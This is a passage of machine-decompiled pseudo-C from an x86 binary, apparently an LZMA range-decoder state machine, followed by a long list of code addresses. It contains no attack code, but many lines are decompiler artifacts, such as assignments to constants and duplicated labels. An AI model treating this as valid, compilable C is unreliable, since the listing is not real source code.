												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														__ebx = __edx + 1;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407023
0x0040702a
0x00407030
0x00407036
0x00407048
0x0040704e
0x00407053
0x00000000
0x00407004
0x0040700a
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
